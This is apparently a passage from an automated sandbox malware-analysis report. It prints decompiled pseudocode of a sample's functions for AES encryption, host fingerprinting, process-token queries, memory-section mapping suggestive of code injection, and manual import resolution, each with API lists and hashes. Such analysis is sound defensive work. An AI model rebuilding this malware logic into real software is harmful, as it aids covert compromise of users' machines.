            				int _t90;
            				signed int _t94;
            				int _t101;
            				void* _t102;
            				int _t103;
            				void* _t104;
            				void* _t105;
            				void* _t106;
            
            				_t103 = __eax;
            				_t94 = 6;
            				_v68 = 0;
            				memset( &_v67, 0, _t94 << 2);
            				_t105 = _t104 + 0xc;
            				asm("stosw");
            				asm("stosb");
            				_v40 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				asm("stosb");
            				_t61 =  *0x202a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
            				if(_t61 == 0) {
            					_a8 = GetLastError();
            				} else {
            					_t101 = 0x10;
            					memcpy( &_v56, _a8, _t101);
            					_t106 = _t105 + 0xc;
            					_v60 = _t101;
            					_v67 = 2;
            					_v64 = 0x660e;
            					_v68 = 8;
            					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
            					if(_t68 == 0) {
            						_a8 = GetLastError();
            					} else {
            						_push(0);
            						_push( &_v40);
            						_push(1);
            						_push(_v12);
            						if( *0x202a0e4() == 0) {
            							_a8 = GetLastError();
            						} else {
            							_t18 = _t103 + 0xf; // 0x10
            							_t76 = _t18 & 0xfffffff0;
            							if(_a4 != 0 && _t76 == _t103) {
            								_t76 = _t76 + _t101;
            							}
            							_t102 = E020233DC(_t76);
            							_v20 = _t102;
            							if(_t102 == 0) {
            								_a8 = 8;
            							} else {
            								_v16 = 0;
            								_a8 = 0;
            								while(1) {
            									_t79 = 0x10;
            									_v8 = _t79;
            									if(_t103 <= _t79) {
            										_v8 = _t103;
            									}
            									memcpy(_t102, _a12, _v8);
            									_t81 = _v8;
            									_a12 = _a12 + _t81;
            									_t103 = _t103 - _t81;
            									_t106 = _t106 + 0xc;
            									if(_a4 == 0) {
            										_t85 =  *0x202a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
            									} else {
            										_t85 =  *0x202a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
            									}
            									if(_t85 == 0) {
            										break;
            									}
            									_t90 = _v8;
            									_v16 = _v16 + _t90;
            									_t102 = _t102 + _t90;
            									if(_t103 != 0) {
            										continue;
            									} else {
            										L17:
            										 *_a16 = _v20;
            										 *_a20 = _v16;
            									}
            									goto L21;
            								}
            								_t86 = GetLastError();
            								_a8 = _t86;
            								if(_t86 != 0) {
            									E020261DA(_v20);
            								} else {
            									goto L17;
            								}
            							}
            						}
            						L21:
            						CryptDestroyKey(_v12);
            					}
            					CryptReleaseContext(_v24, 0);
            				}
            				return _a8;
            			}






























            0x02021511
            0x02021517
            0x0202151a
            0x02021520
            0x02021520
            0x02021522
            0x02021524
            0x02021527
            0x0202152d
            0x0202152e
            0x0202152f
            0x02021535
            0x0202153a
            0x02021540
            0x02021548
            0x020216a5
            0x0202154e
            0x02021550
            0x02021559
            0x0202155e
            0x02021570
            0x02021573
            0x02021577
            0x0202157e
            0x02021582
            0x0202158a
            0x02021690
            0x02021590
            0x02021590
            0x02021594
            0x02021595
            0x02021597
            0x020215a2
            0x0202167c
            0x020215a8
            0x020215a8
            0x020215ab
            0x020215b1
            0x020215b7
            0x020215b7
            0x020215bf
            0x020215c1
            0x020215c6
            0x0202166d
            0x020215cc
            0x020215d2
            0x020215d5
            0x020215d8
            0x020215da
            0x020215db
            0x020215e0
            0x020215e2
            0x020215e2
            0x020215ec
            0x020215f1
            0x020215f4
            0x020215f7
            0x020215f9
            0x02021602
            0x0202162c
            0x02021604
            0x02021615
            0x02021615
            0x02021634
            0x00000000
            0x00000000
            0x02021636
            0x02021639
            0x0202163c
            0x02021640
            0x00000000
            0x02021642
            0x02021651
            0x02021657
            0x0202165f
            0x0202165f
            0x00000000
            0x02021640
            0x02021644
            0x0202164a
            0x0202164f
            0x02021666
            0x00000000
            0x00000000
            0x00000000
            0x0202164f
            0x020215c6
            0x0202167f
            0x02021682
            0x02021682
            0x02021697
            0x02021697
            0x020216af

            APIs
            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02025088,00000001,02023ECE,00000000), ref: 02021540
            • memcpy.NTDLL(02025088,02023ECE,00000010,?,?,?,02025088,00000001,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740), ref: 02021559
            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02021582
            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0202159A
            • memcpy.NTDLL(00000000,76B5C740,02CA9600,00000010), ref: 020215EC
            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02CA9600,00000020,?,?,00000010), ref: 02021615
            • GetLastError.KERNEL32(?,?,00000010), ref: 02021644
            • GetLastError.KERNEL32 ref: 02021676
            • CryptDestroyKey.ADVAPI32(00000000), ref: 02021682
            • GetLastError.KERNEL32 ref: 0202168A
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02021697
            • GetLastError.KERNEL32(?,?,?,02025088,00000001,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 0202169F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
            • String ID: @MetNet
            • API String ID: 3401600162-2109406137
            • Opcode ID: 06fbfc4ec6294b8387ba7aec2fdb10e57219c8055bea163b9af2e6c9054f0673
            • Instruction ID: 37b3a1793b022d3f4a3b52560f212f080b11523c86a3b9976d64ec44293775ad
            • Opcode Fuzzy Hash: 06fbfc4ec6294b8387ba7aec2fdb10e57219c8055bea163b9af2e6c9054f0673
            • Instruction Fuzzy Hash: 6F516DB1900318FFDB11DFA4DC88AAEBBB9FB08344F154466F919E6141D7758A18EF60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 235 2023bd3-2023be7 236 2023bf1-2023c03 call 20271cd 235->236 237 2023be9-2023bee 235->237 240 2023c57-2023c64 236->240 241 2023c05-2023c15 GetUserNameW 236->241 237->236 242 2023c66-2023c7d GetComputerNameW 240->242 241->242 243 2023c17-2023c27 RtlAllocateHeap 241->243 245 2023cbb-2023cdf 242->245 246 2023c7f-2023c90 RtlAllocateHeap 242->246 243->242 244 2023c29-2023c36 GetUserNameW 243->244 247 2023c46-2023c55 244->247 248 2023c38-2023c44 call 20256b9 244->248 246->245 249 2023c92-2023c9b GetComputerNameW 246->249 247->242 248->247 251 2023cac-2023caf 249->251 252 2023c9d-2023ca9 call 20256b9 249->252 251->245 252->251
            C-Code - Quality: 96%
            			E02023BD3(char __eax, void* __esi) {
            				long _v8;
            				char _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v28;
            				long _t34;
            				signed int _t39;
            				long _t50;
            				char _t59;
            				intOrPtr _t61;
            				void* _t62;
            				void* _t64;
            				char _t65;
            				intOrPtr* _t67;
            				void* _t68;
            				void* _t69;
            
            				_t69 = __esi;
            				_t65 = __eax;
            				_v8 = 0;
            				_v12 = __eax;
            				if(__eax == 0) {
            					_t59 =  *0x202a310; // 0xd448b889
            					_v12 = _t59;
            				}
            				_t64 = _t69;
            				E020271CD( &_v12, _t64);
            				if(_t65 != 0) {
            					 *_t69 =  *_t69 ^  *0x202a344 ^ 0x6c7261ae;
            				} else {
            					GetUserNameW(0,  &_v8); // executed
            					_t50 = _v8;
            					if(_t50 != 0) {
            						_t62 = RtlAllocateHeap( *0x202a2d8, 0, _t50 + _t50);
            						if(_t62 != 0) {
            							if(GetUserNameW(_t62,  &_v8) != 0) {
            								_t64 = _t62;
            								 *_t69 =  *_t69 ^ E020256B9(_v8 + _v8, _t64);
            							}
            							HeapFree( *0x202a2d8, 0, _t62);
            						}
            					}
            				}
            				_t61 = __imp__;
            				_v8 = _v8 & 0x00000000;
            				GetComputerNameW(0,  &_v8);
            				_t34 = _v8;
            				if(_t34 != 0) {
            					_t68 = RtlAllocateHeap( *0x202a2d8, 0, _t34 + _t34);
            					if(_t68 != 0) {
            						if(GetComputerNameW(_t68,  &_v8) != 0) {
            							_t64 = _t68;
            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E020256B9(_v8 + _v8, _t64);
            						}
            						HeapFree( *0x202a2d8, 0, _t68);
            					}
            				}
            				asm("cpuid");
            				_t67 =  &_v28;
            				 *_t67 = 1;
            				 *((intOrPtr*)(_t67 + 4)) = _t61;
            				 *((intOrPtr*)(_t67 + 8)) = 0;
            				 *(_t67 + 0xc) = _t64;
            				_t39 = _v16 ^ _v20 ^ _v28;
            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
            				return _t39;
            			}



















            0x02023bd3
            0x02023bdb
            0x02023bdf
            0x02023be2
            0x02023be7
            0x02023be9
            0x02023bee
            0x02023bee
            0x02023bf4
            0x02023bf6
            0x02023c03
            0x02023c64
            0x02023c05
            0x02023c0a
            0x02023c10
            0x02023c15
            0x02023c23
            0x02023c27
            0x02023c36
            0x02023c3d
            0x02023c44
            0x02023c44
            0x02023c4f
            0x02023c4f
            0x02023c27
            0x02023c15
            0x02023c66
            0x02023c6c
            0x02023c76
            0x02023c78
            0x02023c7d
            0x02023c8c
            0x02023c90
            0x02023c9b
            0x02023ca2
            0x02023ca9
            0x02023ca9
            0x02023cb5
            0x02023cb5
            0x02023c90
            0x02023cc0
            0x02023cc2
            0x02023cc5
            0x02023cc7
            0x02023cca
            0x02023ccd
            0x02023cd7
            0x02023cdb
            0x02023cdf

            APIs
            • GetUserNameW.ADVAPI32(00000000,?), ref: 02023C0A
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 02023C21
            • GetUserNameW.ADVAPI32(00000000,?), ref: 02023C2E
            • HeapFree.KERNEL32(00000000,00000000), ref: 02023C4F
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02023C76
            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02023C8A
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02023C97
            • HeapFree.KERNEL32(00000000,00000000), ref: 02023CB5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: HeapName$AllocateComputerFreeUser
            • String ID: Uet
            • API String ID: 3239747167-2766386878
            • Opcode ID: cb27895a565a0bbac2bfe2300e2aaeb8fd757c10cb41e667c1204cc0304dc01c
            • Instruction ID: c90dff4b9df3fac6aad30136a7a15dd21d74ee773d437d387e32214f10f1e754
            • Opcode Fuzzy Hash: cb27895a565a0bbac2bfe2300e2aaeb8fd757c10cb41e667c1204cc0304dc01c
            • Instruction Fuzzy Hash: 45312A71A00309AFD721DFA9CDC1AAEB7F9FB48704F71446AE504D3210DB34EA59AB10
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 38%
            			E0202421F(char _a4, void* _a8) {
            				void* _v8;
            				void* _v12;
            				char _v16;
            				void* _v20;
            				char _v24;
            				char _v28;
            				char _v32;
            				char _v36;
            				char _v40;
            				void* _v44;
            				void** _t33;
            				void* _t40;
            				void* _t43;
            				void** _t44;
            				intOrPtr* _t47;
            				char _t48;
            
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v20 = _a4;
            				_t48 = 0;
            				_v16 = 0;
            				_a4 = 0;
            				_v44 = 0x18;
            				_v40 = 0;
            				_v32 = 0;
            				_v36 = 0;
            				_v28 = 0;
            				_v24 = 0;
            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
            					_t33 =  &_v8;
            					__imp__(_v12, 8, _t33);
            					if(_t33 >= 0) {
            						_t47 = __imp__;
            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
            						_t44 = E020233DC(_a4);
            						if(_t44 != 0) {
            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
            							if(_t40 >= 0) {
            								memcpy(_a8,  *_t44, 0x1c);
            								_t48 = 1;
            							}
            							E020261DA(_t44);
            						}
            						NtClose(_v8); // executed
            					}
            					NtClose(_v12);
            				}
            				return _t48;
            			}



















            0x0202422c
            0x0202422d
            0x0202422e
            0x0202422f
            0x02024230
            0x02024234
            0x0202423b
            0x0202424a
            0x0202424d
            0x02024250
            0x02024257
            0x0202425a
            0x0202425d
            0x02024260
            0x02024263
            0x0202426e
            0x02024270
            0x02024279
            0x02024281
            0x02024283
            0x02024295
            0x0202429f
            0x020242a3
            0x020242b2
            0x020242b6
            0x020242bf
            0x020242c7
            0x020242c7
            0x020242c9
            0x020242c9
            0x020242d1
            0x020242d7
            0x020242db
            0x020242db
            0x020242e6

            APIs
            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02024266
            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02024279
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02024295
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 020242B2
            • memcpy.NTDLL(?,00000000,0000001C), ref: 020242BF
            • NtClose.NTDLL(?), ref: 020242D1
            • NtClose.NTDLL(00000000), ref: 020242DB
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
            • String ID:
            • API String ID: 2575439697-0
            • Opcode ID: a818463a7ef5e005aee9773dbbf1f69fb8dfdba5b36bfd3b381e23a54e4d9cae
            • Instruction ID: 3f63bcf7d293c266bd52178ceeef4eced7e57f808b40065b7178dba7c1366ac3
            • Opcode Fuzzy Hash: a818463a7ef5e005aee9773dbbf1f69fb8dfdba5b36bfd3b381e23a54e4d9cae
            • Instruction Fuzzy Hash: 8C2114B2A0022CBFDB119FA5CC84ADEBFBDFF08750F214022F905A6150D7759B589BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 369 4015b0-401607 GetSystemTimeAsFileTime 372 401609 369->372 373 40160e-401627 CreateFileMappingW 369->373 372->373 374 401671-401677 GetLastError 373->374 375 401629-401632 373->375 378 401679-40167f 374->378 376 401642-401650 MapViewOfFile 375->376 377 401634-40163b GetLastError 375->377 380 401660-401666 GetLastError 376->380 381 401652-40165e 376->381 377->376 379 40163d-401640 377->379 382 401668-40166f CloseHandle 379->382 380->378 380->382 381->378 382->378
            C-Code - Quality: 69%
            			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
            				intOrPtr _v12;
            				struct _FILETIME* _v16;
            				short _v60;
            				struct _FILETIME* _t14;
            				intOrPtr _t15;
            				long _t18;
            				void* _t19;
            				void* _t22;
            				intOrPtr _t31;
            				long _t32;
            				void* _t34;
            
            				_t31 = __edx;
            				_t14 =  &_v16;
            				GetSystemTimeAsFileTime(_t14);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v12);
            				_push(_v16);
            				L00402026();
            				_push(_t14);
            				_v16 = _t14;
            				_t15 =  *0x404184;
            				_push(_t15 + 0x4051ca);
            				_push(_t15 + 0x4051c0);
            				_push(0x16);
            				_push( &_v60);
            				_v12 = _t31;
            				L00402020();
            				_t18 = _a4;
            				if(_t18 == 0) {
            					_t18 = 0x1000;
            				}
            				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
            				_t34 = _t19;
            				if(_t34 == 0) {
            					_t32 = GetLastError();
            				} else {
            					if(_a4 != 0 || GetLastError() == 0xb7) {
            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
            						if(_t22 == 0) {
            							_t32 = GetLastError();
            							if(_t32 != 0) {
            								goto L9;
            							}
            						} else {
            							 *_a8 = _t34;
            							 *_a12 = _t22;
            							_t32 = 0;
            						}
            					} else {
            						_t32 = 2;
            						L9:
            						CloseHandle(_t34);
            					}
            				}
            				return _t32;
            			}














            0x004015b0
            0x004015b9
            0x004015bd
            0x004015c3
            0x004015c8
            0x004015cd
            0x004015d0
            0x004015d3
            0x004015d8
            0x004015d9
            0x004015dc
            0x004015e7
            0x004015ee
            0x004015f2
            0x004015f4
            0x004015f5
            0x004015f8
            0x004015fd
            0x00401607
            0x00401609
            0x00401609
            0x0040161d
            0x00401623
            0x00401627
            0x00401677
            0x00401629
            0x00401632
            0x00401648
            0x00401650
            0x00401662
            0x00401666
            0x00000000
            0x00000000
            0x00401652
            0x00401655
            0x0040165a
            0x0040165c
            0x0040165c
            0x0040163d
            0x0040163f
            0x00401668
            0x00401669
            0x00401669
            0x00401632
            0x0040167f

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
            • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
            • String ID:
            • API String ID: 3812556954-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E0040110B(intOrPtr* __eax, void** _a4) {
            				int _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				int _v28;
            				int _v32;
            				intOrPtr _v36;
            				int _v40;
            				int _v44;
            				void* _v48;
            				void* __esi;
            				long _t34;
            				void* _t39;
            				void* _t47;
            				intOrPtr* _t48;
            
            				_t48 = __eax;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v24 =  *((intOrPtr*)(__eax + 4));
            				_v16 = 0;
            				_v12 = 0;
            				_v48 = 0x18;
            				_v44 = 0;
            				_v36 = 0x40;
            				_v40 = 0;
            				_v32 = 0;
            				_v28 = 0;
            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
            				if(_t34 < 0) {
            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
            				} else {
            					 *_t48 = _v16;
            					_t39 = E00401459(_t48,  &_v12); // executed
            					_t47 = _t39;
            					if(_t47 != 0) {
            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
            					} else {
            						memset(_v12, 0, _v24);
            						 *_a4 = _v12;
            					}
            				}
            				return _t47;
            			}


















            0x00401114
            0x0040111b
            0x0040111c
            0x0040111d
            0x0040111e
            0x0040111f
            0x00401130
            0x00401134
            0x00401148
            0x0040114b
            0x0040114e
            0x00401155
            0x00401158
            0x0040115f
            0x00401162
            0x00401165
            0x00401168
            0x0040116d
            0x004011a8
            0x0040116f
            0x00401172
            0x00401178
            0x0040117d
            0x00401181
            0x0040119f
            0x00401183
            0x0040118a
            0x00401198
            0x00401198
            0x00401181
            0x004011b0

            APIs
            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            • memset.NTDLL ref: 0040118A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: Section$CreateViewmemset
            • String ID: @
            • API String ID: 2533685722-2766056989
            • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
            • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401000(void* __edi, intOrPtr _a4) {
            				signed int _v8;
            				intOrPtr* _v12;
            				_Unknown_base(*)()** _v16;
            				signed int _v20;
            				signed short _v24;
            				struct HINSTANCE__* _v28;
            				intOrPtr _t43;
            				intOrPtr* _t45;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t47;
            				intOrPtr* _t49;
            				intOrPtr _t50;
            				signed short _t51;
            				_Unknown_base(*)()* _t53;
            				CHAR* _t54;
            				_Unknown_base(*)()* _t55;
            				void* _t58;
            				signed int _t59;
            				_Unknown_base(*)()* _t60;
            				intOrPtr _t61;
            				intOrPtr _t65;
            				signed int _t68;
            				void* _t69;
            				CHAR* _t71;
            				signed short* _t73;
            
            				_t69 = __edi;
            				_v20 = _v20 & 0x00000000;
            				_t59 =  *0x404180;
            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
            				if(_t43 != 0) {
            					_t45 = _t43 + __edi;
            					_v12 = _t45;
            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
            					if(_t46 != 0) {
            						while(1) {
            							_t71 = _t46 + _t69;
            							_t47 = LoadLibraryA(_t71); // executed
            							_v28 = _t47;
            							if(_t47 == 0) {
            								break;
            							}
            							_v24 = _v24 & 0x00000000;
            							 *_t71 = _t59 - 0x43175ac3;
            							_t49 = _v12;
            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
            							_t50 =  *_t49;
            							if(_t50 != 0) {
            								L6:
            								_t73 = _t50 + _t69;
            								_v16 = _t61 + _t69;
            								while(1) {
            									_t51 =  *_t73;
            									if(_t51 == 0) {
            										break;
            									}
            									if(__eflags < 0) {
            										__eflags = _t51 - _t69;
            										if(_t51 < _t69) {
            											L12:
            											_t21 =  &_v8;
            											 *_t21 = _v8 & 0x00000000;
            											__eflags =  *_t21;
            											_v24 =  *_t73 & 0x0000ffff;
            										} else {
            											_t65 = _a4;
            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
            												goto L12;
            											} else {
            												goto L11;
            											}
            										}
            									} else {
            										_t51 = _t51 + _t69;
            										L11:
            										_v8 = _t51;
            									}
            									_t53 = _v8;
            									__eflags = _t53;
            									if(_t53 == 0) {
            										_t54 = _v24 & 0x0000ffff;
            									} else {
            										_t54 = _t53 + 2;
            									}
            									_t55 = GetProcAddress(_v28, _t54);
            									__eflags = _t55;
            									if(__eflags == 0) {
            										_v20 = _t59 - 0x43175a44;
            									} else {
            										_t68 = _v8;
            										__eflags = _t68;
            										if(_t68 != 0) {
            											 *_t68 = _t59 - 0x43175ac3;
            										}
            										 *_v16 = _t55;
            										_t58 = _t59 * 4 - 0xc5d6b08;
            										_t73 = _t73 + _t58;
            										_t32 =  &_v16;
            										 *_t32 = _v16 + _t58;
            										__eflags =  *_t32;
            										continue;
            									}
            									goto L23;
            								}
            							} else {
            								_t50 = _t61;
            								if(_t61 != 0) {
            									goto L6;
            								}
            							}
            							L23:
            							_v12 = _v12 + 0x14;
            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
            							if(_t46 != 0) {
            								continue;
            							} else {
            							}
            							L26:
            							goto L27;
            						}
            						_t60 = _t59 + 0xbce8a5bb;
            						__eflags = _t60;
            						_v20 = _t60;
            						goto L26;
            					}
            				}
            				L27:
            				return _v20;
            			}




























            0x00401000
            0x00401009
            0x0040100e
            0x00401014
            0x0040101d
            0x00401023
            0x00401025
            0x00401028
            0x0040102d
            0x00401034
            0x00401034
            0x00401038
            0x0040103e
            0x00401043
            0x00000000
            0x00000000
            0x00401049
            0x00401053
            0x00401055
            0x00401058
            0x0040105b
            0x0040105f
            0x00401067
            0x00401069
            0x0040106c
            0x004010d4
            0x004010d4
            0x004010d8
            0x00000000
            0x00000000
            0x00401071
            0x00401077
            0x00401079
            0x0040108c
            0x0040108f
            0x0040108f
            0x0040108f
            0x00401093
            0x0040107b
            0x0040107b
            0x00401083
            0x00401085
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00401085
            0x00401073
            0x00401073
            0x00401087
            0x00401087
            0x00401087
            0x00401096
            0x00401099
            0x0040109b
            0x004010a2
            0x0040109d
            0x0040109d
            0x0040109d
            0x004010aa
            0x004010b0
            0x004010b2
            0x004010e2
            0x004010b4
            0x004010b4
            0x004010b7
            0x004010b9
            0x004010c1
            0x004010c1
            0x004010c6
            0x004010c8
            0x004010cf
            0x004010d1
            0x004010d1
            0x004010d1
            0x00000000
            0x004010d1
            0x00000000
            0x004010b2
            0x00401061
            0x00401061
            0x00401065
            0x00000000
            0x00000000
            0x00401065
            0x004010e5
            0x004010e5
            0x004010ec
            0x004010f1
            0x00000000
            0x00000000
            0x004010f7
            0x00401102
            0x00000000
            0x00401102
            0x004010f9
            0x004010f9
            0x004010ff
            0x00000000
            0x004010ff
            0x0040102d
            0x00401103
            0x00401108

            APIs
            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
            • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
